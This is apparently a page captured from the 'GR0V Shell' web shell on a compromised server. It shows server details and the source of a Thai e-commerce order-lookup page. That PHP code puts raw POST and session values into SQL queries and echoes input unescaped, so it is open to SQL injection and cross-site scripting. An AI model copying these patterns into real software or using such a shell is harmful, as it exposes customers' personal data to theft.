? GR0V Shell

GR0V shell

Linux www.koreapackagetour.com 2.6.32-042stab145.3 #1 SMP Thu Jun 11 14:05:04 MSK 2020 x86_64

Path : /home/admin/domains/happytokorea.com/public_html_bk/promice/
File Upload :
Current File : /home/admin/domains/happytokorea.com/public_html_bk/promice/CheckMyOrderNow.php

<?
@session_start();
ob_start();
$usermem = $_SESSION["usermem"];
require_once "include/connectdb.php";
require_once "include/connect.php";
require_once "include/tdate.php";
if(empty($usermem)) 
{
$showmember = "
<table width=100% border=0 align=center cellpadding=1 cellspacing=1>
  <form method=post action=SignIn.php><tr> 
    <td width=32% align=right>ชื่อสมาชิก :</td>
    <td width=68%><input name=usermem type=text size=15></td>
  </tr>
  <tr> 
    <td align=right>รหัสผ่าน :</td>
    <td><input name=passmem type=password size=15></td>
  </tr>
  <tr> 
    <td>&nbsp;</td>
    <td><input name=submit type=submit class=submit value=เข้าสู่ระบบ!></td>
  </tr>
  <tr>
    <td>&nbsp;</td>
    <td>! <a href=ForgetPass.php>ลืมรหัสผ่าน</a></td>
  </tr></form>
</table>
";
}else{
$sql="select * from member where usermem='$usermem'";
						  $db_query=mysql_db_query($db,$sql);
						  $result=mysql_fetch_array($db_query);
						  $idxx=$result[id];
						  $usename=$result[name];
						  $user_mem=$result[usermem];
						  $pass_mem=$result[passmem];
$showmember = "
<div align=center><img src=images/user.gif width=25 height=15>ยินดีต้อนรับ :$usename
<br>[ <a href=CheckMyOrder.php>ประวัติสั่งซื้อสินค้า</a> ] 
<br>[ <a href=ChangePass.php>เปลี่ยนรหัสผ่าน</a> ] 
<br>[ <a href=Profiles.php>ข้อมูลส่วนตัว</a> ] 
<br>[<a href=Logout.php>ออกจากระบบ</a>] 
</div>
";
$myorder = "<a href=CheckMyOrder.php><img src=images/myorder.gif border=0><a>";
}

?>
<html>
<head>
<title><? echo "$headtxt_web"; ?></title>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<link href="css/instyle.css" rel="stylesheet" type="text/css">
<link href="css/style1.css" rel="stylesheet" type="text/css">
<link href="css/style.css" rel="stylesheet" type="text/css">
	<link rel="stylesheet" href="css/lightbox.css" type="text/css" media="screen" />
	
	<script src="css/jquery-latest.pack.js" type="text/javascript"></script>
	<script src="css/jquery.lightbox.js" type="text/javascript"></script>
	<script>
		$(document).ready(function(){
			$(".lightbox").lightbox();
		});

	</script>
<LINK href="css/contentslider2.css" type=text/css rel=stylesheet>
<STYLE type=text/css>
BODY {
	MARGIN-TOP: 0px; MARGIN-LEFT: 0px
}
</STYLE>
 
<SCRIPT src="js/contentslider.js" type=text/javascript> 
 
 
</SCRIPT>
<script language="JavaScript" type="text/JavaScript">
<!--
function MM_swapImgRestore() { //v3.0
  var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc;
}

function MM_preloadImages() { //v3.0
  var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array();
    var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i++)
    if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}}
}

function MM_findObj(n, d) { //v4.01
  var p,i,x;  if(!d) d=document; if((p=n.indexOf("?"))>0&&parent.frames.length) {
    d=parent.frames[n.substring(p+1)].document; n=n.substring(0,p);}
  if(!(x=d[n])&&d.all) x=d.all[n]; for (i=0;!x&&i<d.forms.length;i++) x=d.forms[i][n];
  for(i=0;!x&&d.layers&&i<d.layers.length;i++) x=MM_findObj(n,d.layers[i].document);
  if(!x && d.getElementById) x=d.getElementById(n); return x;
}

function MM_swapImage() { //v3.0
  var i,j=0,x,a=MM_swapImage.arguments; document.MM_sr=new Array; for(i=0;i<(a.length-2);i+=3)
   if ((x=MM_findObj(a[i]))!=null){document.MM_sr[j++]=x; if(!x.oSrc) x.oSrc=x.src; x.src=a[i+2];}
}
//-->
</script>
<style>
.jc{
position:relative;
}
.style1 {
	color: #FFFFFF;
	font-weight: bold;
	font-size: 10pt;
}
</style>

<script language="JavaScript1.2">
var ns6=document.getElementById&&!document.all
var ie=document.all

var customcollect=new Array()
var i=0

function jiggleit(num){
if ((!document.all&&!document.getElementById)) return;
customcollect[num].style.left=(parseInt(customcollect[num].style.left)==-1)? customcollect[num].style.left=1 : customcollect[num].style.left=-1
}

function init(){
if (ie){
while (eval("document.all.jiggle"+i)!=null){
customcollect[i]= eval("document.all.jiggle"+i)
i++
} 
}
else if (ns6){
while (document.getElementById("jiggle"+i)!=null){
customcollect[i]= document.getElementById("jiggle"+i)
i++
}
}

if (customcollect.length==1)
setInterval("jiggleit(0)",80)
else if (customcollect.length>1)
for (y=0;y<customcollect.length;y++){
var tempvariable='setInterval("jiggleit('+y+')",'+'100)'
eval(tempvariable)
}
}
window.onload=init
</script>
</head>
<body bgcolor="#ffffff" background="images/bg.gif">
<table width="1000" border="0" align="center" cellpadding="0" cellspacing="0">
  <!-- fwtable fwsrc="Untitled" fwbase="home.jpg" fwstyle="Dreamweaver" fwdocid = "742308039" fwnested="0" -->
  <tr>
   <td><img src="images/spacer.gif" width="423" height="1" border="0" alt=""></td>
   <td><img src="images/spacer.gif" width="16" height="1" border="0" alt=""></td>
   <td><img src="images/spacer.gif" width="225" height="1" border="0" alt=""></td>
   <td><img src="images/spacer.gif" width="315" height="1" border="0" alt=""></td>
   <td><img src="images/spacer.gif" width="21" height="1" border="0" alt=""></td>
   <td><img src="images/spacer.gif" width="1" height="1" border="0" alt=""></td>
  </tr>

  <tr>
   <td colspan="5" bgcolor="#EAECEB">&nbsp;</td>
   <td><img src="images/spacer.gif" width="1" height="20" border="0" alt=""></td>
  </tr>
  <tr>
   <td bgcolor="#EAECEB"><img src="images/web_01.jpg" width="191" height="144" alt=""></td>
   <td colspan="2" bgcolor="#EAECEB">&nbsp;</td>
    <td bgcolor="#EAECEB">&nbsp;</td>
    <td bgcolor="#EAECEB">&nbsp;</td>
   <td><img src="images/spacer.gif" width="1" height="133" border="0" alt=""></td>
  </tr>
  <tr>
    <td colspan="5"><table width="997" border="0" cellpadding="0" cellspacing="0">
      <tr>
        <td width="124"><a href="index.php"><img src="images/images/menu_01.jpg" width="124" height="70" border="0"></a></td>
        <td width="146"><a href="Member.php"><img src="images/images/menu_02.jpg" width="146" height="70" border="0"></a></td>
        <td width="141"><a href="Products.php"><img src="images/images/menu_03.jpg" width="141" height="70" border="0"></a></td>
        <td width="131"><a href="Payment.php"><img src="images/images/menu_04.jpg" width="131" height="70" border="0"></a></td>
        <td width="131"><a href="ConfirmPayment.php"><img src="images/images/menu_05.jpg" width="131" height="70" border="0"></a></td>
        <td width="103"><img src="images/images/menu_06.jpg" width="103" height="70" border="0"></td>
        <td width="86"><a href="Webboard.php"><img src="images/images/menu_07.jpg" width="112" height="70" border="0"></a></td>
        <td><a href="Contact.php"><img src="images/images/menu_08.jpg" width="112" height="70" border="0"></a></td>
      </tr>
    </table></td>
    <td><img src="images/spacer.gif" width="1" height="62" border="0" alt=""></td>
  </tr>
  <tr>
    <td colspan="5" bgcolor="#FFFFFF"><div align="center"> 
        <table width="100%" border="0" cellspacing="0" cellpadding="0">
          <tr valign="top"> 
            <td width="245"><table width="100%" border="0" cellspacing="1" cellpadding="1">
                <tr>
                  <td><div align="center"> <? echo "$showmember"; ?></div></td>
                </tr>
                <tr> 
                  <td><img src="images/web_07.jpg" width="242" height="42" alt=""></td>
                </tr>
                <tr> 
                  <td> 
                    <?
$page = $_GET['page'];
$select_type="select * from productstype  order by id asc";
$query_select=mysql_query($select_type);
$num_rows=mysql_num_rows($query_select);

if($num_rows<1){
echo "<br><br><center><b>ยังไม่มีการเพิ่มข้อมูลค่ะ</b></center>";
}else{
		$select="select * from productstype  order by id asc";
		$q_ry = mysql_query($select);
	 	$num_rows=mysql_num_rows($q_ry);
  		$pagesize=20;
		$rt=$num_rows%$pagesize;
		if($rt!=0)
			{
				$totalpage=floor($num_rows/$pagesize)+1;
			}
		else
			{
				$totalpage=floor($num_rows/$pagesize);
				$toppic_id=1;
			}
		if(empty($page))
			{
				$page=1;
			}
		mysql_free_result($q_ry);
		$goto=($page-1)*$pagesize;
$sql_select_mem="Select * From productstype  order by id asc limit $goto,$pagesize";
		$fect=mysql_query($sql_select_mem);
		if(!$fect)
		{
		("ติดต่อฐานข้อมูลไม่ได้".mysql_error());
		exit;
		}

	  $bgcount=0;
	while($rows=mysql_fetch_array($fect))
	{
$idx =$rows['id'];
$productstypecode  =$rows['productstypecode'];
$productstypename = $rows['productstypename'];
$bgcount=$bgcount+1;
$bgmod=$bgcount%2;
if($bgmod==0){
	$bgcolor="#E9E9E8";
}else{
	$bgcolor="#FFFFFF";
}

$s_num="select * from products where productstypecode = '$productstypecode'";
$query_select_num=mysql_query($s_num);
$snum=mysql_num_rows($query_select_num);
	?>
                    <table width="100%" border="0" cellspacing="1" cellpadding="1">
                      <tr> 
                        <td height="23"> <div align="left"></div>
                          <div align="left"></div>
                          <div align="center"> </div>
                          <div align="left"><img src="images/opened.gif" width="17" height="17"> 
                            <? echo "<a href=ProductList.php?PRD=$productstypecode>$productstypename</a> ($snum)"; ?></div></td>
                      </tr>
                      <tr> 
                        <td height="5"><img src="images/inline.jpg" width="184" height="3"></td>
                      </tr>
                    </table>
                    <?
}
}
?>                  </td>
                </tr>
                <tr> 
                  <td>&nbsp;</td>
                </tr>
                <tr> 
                  <td><img src="images/web_07.jpg" width="242" height="42" alt=""></td>
                </tr>
                <tr> 
                  <td> 
                    <?
$pages = $_GET['pages'];
$select_types="select * from products  order by id asc";
$query_selects=mysql_query($select_types);
$num_rowss=mysql_num_rows($query_selects);

if($num_rowss<1){
echo "<br><br><center><b>ยังไม่มีการเพิ่มข้อมูลค่ะ</b></center>";
}else{
		$selects="select * from products order by id asc";
		$q_rys = mysql_query($selects);
	 	$num_rowss=mysql_num_rows($q_rys);
  		$pagesizes=10;
		$rts=$num_rowss%$pagesizes;
		if($rts!=0)
			{
				$totalpages=floor($num_rowss/$pagesizes)+1;
			}
		else
			{
				$totalpages=floor($num_rows/$pagesizes);
				$toppic_ids=1;
			}
		if(empty($pages))
			{
				$pages=1;
			}
		mysql_free_result($q_rys);
		$gotos=($pages-1)*$pagesizes;
$sql_select_mems="Select * From products  order by stats desc limit $goto,$pagesize";
		$fects=mysql_query($sql_select_mems);
		if(!$fects)
		{
		("ติดต่อฐานข้อมูลไม่ได้".mysql_error());
		exit;
		}

	  $bgcounts=0;
	while($rowss=mysql_fetch_array($fects))
	{
$idxs =$rowss['id'];
$productsNameShow = $rowss['productsname'];
$stats = $rowss['stats'];
$bgcounts=$bgcounts+1;
$bgmods=$bgcounts%2;
if($bgmods==0){
	$bgcolors="#E9E9E8";
}else{
	$bgcolors="#FFFFFF";
}
	?>
                    <table width="100%" border="0" cellspacing="1" cellpadding="1">
                      <tr> 
                        <td height="23"> <div align="left"></div>
                          <div align="left"></div>
                          <div align="center"> </div>
                          <div align="left"><img src="images/opened.gif" width="17" height="17"> 
                            <? echo "<a href=ShowProducts.php?PrdID=$idxs>$productsNameShow</a> ($stats เครื่อง)"; ?></div></td>
                      </tr>
                      <tr> 
                        <td height="5"><img src="images/inline.jpg" width="184" height="3"></td>
                      </tr>
                    </table>
                    <?
}
}
?>                  </td>
                </tr>
                <tr> 
                  <td><div align="center"><a href="https://www.paysbuy.com/signup.aspx" target="_blank"><br>
                      <br>
                      <br>
                      </a></div></td>
                </tr>
            </table></td>
            <td><table width="100%" border="0" cellspacing="1" cellpadding="1">
                <tr> 
                  <td bgcolor="#FF66FF"><span class="style1">ตรวจสอบรายการสั่งซื้อของฉัน</span></td>
                </tr>
                <tr> 
                  <td> 
                    <?
				  $sqla="select * from tb_order where refid='$_POST[refid]'";
						  $db_query=mysql_db_query($db,$sqla);
						  $resulta=mysql_fetch_array($db_query);
						  $pPrice=$resulta[pPrice];
						  $pNum=$resulta[pNum];
						  $id_cus=$resulta[id_cus];
						  $date=$resulta[date];
						  $pId=$resulta[pId];
						  $paystatus=$resulta[paystatus];
						  $address2=$resulta[address2];
						  
						  $sqlm="select * from member where usermem='$id_cus'";
						  $db_query=mysql_db_query($db,$sqlm);
						  $resultm=mysql_fetch_array($db_query);
						  $fname=$resultm[fname];
						  $name=$resultm[name];
						  $address=$resultm[address];
						  $road=$resultm[road];
						  $district=$resultm[district];
						  $city=$resultm[city];
						  $province=$resultm[province];
						  $country=$resultm[country];
						  $zipcode=$resultm[zipcode];
						  $phone=$resultm[phone];
						  $fax=$resultm[fax];
						  $email=$resultm[email];
				  ?>
                    <table width="100%" border="0" cellspacing="1" cellpadding="1">
                      <tr> 
                        <td width="99" valign="top"> <div align="right">ใบสั่งซื้อเลขที่ 
                            :</div></td>
                        <td width="645"><b><? echo "$_POST[refid]"; ?></b></td>
                      </tr>
                      <tr> 
                        <td valign="top"> <div align="right">ลูกค้า 
                            :</div></td>
                        <td><? echo "$name<br>ที่อยู่ : $address ถนน $road ตำบล/แขวง : $district อำเภอ/แขวง : $city จ.$province $zipcode ประเทศ : $country<br>โทรศัพท์ : $phone Email : $email"; ?></td>
                      </tr>
                    </table>
                    <? 
					if ($address2 != "")
					{
					echo "<br><b><u>หมายเหตุ (มีการเปลี่ยนแปลงที่อยู่ในการจัดส่ง)</u></b><br>$address2<br><br>";
					}else{
					echo "";
					}
					?>                  </td>
                </tr>
                <tr> 
                  <td><table width="100%" border="0" cellspacing="0" cellpadding="0">
                      <tr class="jobscss"> 
                        <td bgcolor="#FFFFFF">วันที่สั่งซื้อ 
                          : <? echo "$date"; ?></td>
                      </tr>
                      <tr class="jobscss"> 
                        <td bgcolor="#FFFFFF"> <table width="100%" border="0" cellspacing="1" cellpadding="1">
                            <tr bgcolor="#993300"> 
                              <td width="285" bgcolor="#FF99FF"><div align="center"><strong>ชื่อสินค้า</strong></div></td>
                              <td width="97" bgcolor="#FF99FF"><div align="center"><strong>ราคา</strong></div></td>
                              <td width="120" bgcolor="#FF99FF"><div align="center"><strong>จำนวน</strong></div></td>
                              <td width="125" bgcolor="#FF99FF"><div align="center"><strong>รวม</strong></div></td>
                            </tr>
                          </table>
                          <?
$page = $_GET['page'];

$select_type="select * from tb_order where refid = '$_POST[refid]' order by id asc";
$query_select=mysql_query($select_type);
$num_rows=mysql_num_rows($query_select);

if($num_rows<1){
echo "<br><br><center><b>ยังไม่มีการเพิ่มข้อมูลค่ะ</b></center>";
}else{
		$select="select * from  tb_order where refid = '$_POST[refid]'   order by id asc";
		$q_ry = mysql_query($select);
	 	$num_rows=mysql_num_rows($q_ry);
  		$pagesize=20;
		$rt=$num_rows%$pagesize;
		if($rt!=0)
			{
				$totalpage=floor($num_rows/$pagesize)+1;
			}
		else
			{
				$totalpage=floor($num_rows/$pagesize);
				$toppic_id=1;
			}
		if(empty($page))
			{
				$page=1;
			}
		mysql_free_result($q_ry);
		$goto=($page-1)*$pagesize;
$sql_select_mem="Select * From  tb_order where refid = '$_POST[refid]'  order by id asc limit $goto,$pagesize";
		$fect=mysql_query($sql_select_mem);
		if(!$fect)
		{
		("ติดต่อฐานข้อมูลไม่ได้".mysql_error());
		exit;
		}

	  $bgcount=0;
	while($rows=mysql_fetch_array($fect))
	{
$idxx =$rows['id'];
$pPrice=$rows[pPrice];
						  $pNum=$rows[pNum];
						  $id_cus=$rows[id_cus];
						  $date=$rows[date];
						  $pId=$rows[pId];
						  $paystatus=$rows[paystatus];

$sqlp="select * from products where productscode='$pId'";
						  $db_query=mysql_db_query($db,$sqlp);
						  $resultp=mysql_fetch_array($db_query);
						  $productsname=$resultp[productsname];
						  $productsprice=$resultp[productsprice];

$bgcount=$bgcount+1;
$bgmod=$bgcount%2;
if($bgmod==0){
	$bgcolor="#E9E9E8";
}else{
	$bgcolor="#FFFFFF";
}
	?>
                          <table width="100%" border="0" cellspacing="1" cellpadding="1">
                            <tr> 
                              <td width="285"><? echo "$productsname"; ?></td>
                              <td width="97"><div align="center"><? echo "$productsprice"; ?></div></td>
                              <td width="120"><div align="center"><? echo "$pNum"; ?></div></td>
                              <td width="125"><div align="center"> 
                                  <? $sum1 = $productsprice*$pNum; echo "$sum1"; ?>
                                  </div></td>
                            </tr>
                          </table>
                          <?
						  $sum2 = $sum2+$sum1;
}
}
?>                        </td>
                      </tr>
                      <tr class="jobscss"> 
                        <td height="19"><table width="100%" border="0" cellspacing="1" cellpadding="1">
                            <tr> 
                              <td width="786"><div align="right"><strong>รวมเงินที่ชำระ 
                                  :</strong> </div></td>
                              <td width="195"><div align="center"><? echo "<b>$sum2</b>"; ?></div></td>
                            </tr>
                          </table></td>
                      </tr>
                      <tr class="jobscss"> 
                        <td><strong><span class="maekhawtom">หน้าที่ 
                          :</span></strong> <span class="maekhawtom"> 
                          <? 
	for($i=1;$i<$page;$i++)
	{
	echo"[<a href='$PHP_SELF?page=$i'>$i</a>]";
	}
	echo"[<b>$page</b>]";
	for($i=$page+1;$i<=$totalpage;$i++)
	{
	echo"[<a href='$PHP_SELF?page=$i'>$i</a>]";
	}
	?>
                          </span><span class="maekhawtom"> 
                          </span></td>
                      </tr>
                      <tr> 
                        <td><div align="center"></div></td>
                      </tr>
                    </table></td>
                </tr>
              </table></td>
          </tr>
        </table>
      </div></td>
   <td><img src="images/spacer.gif" width="1" height="25" border="0" alt=""></td>
  </tr>
  
  <tr>
   <td colspan="5"><table width="1000" height="112" border="0" cellpadding="0" cellspacing="0">
     <tr>
       <td width="244" height="84" background="images/bottom_left.jpg">&nbsp;</td>
       <td width="756" background="images/bottom_right.jpg"><? echo "$buttomtxt_web"; ?></td>
     </tr>
   </table></td>
    <td><img src="images/spacer.gif" width="1" height="71" border="0" alt=""></td>
  </tr>
</table>
</body>
</html>

T1KUS90T
  root-grov@210.1.60.28:~$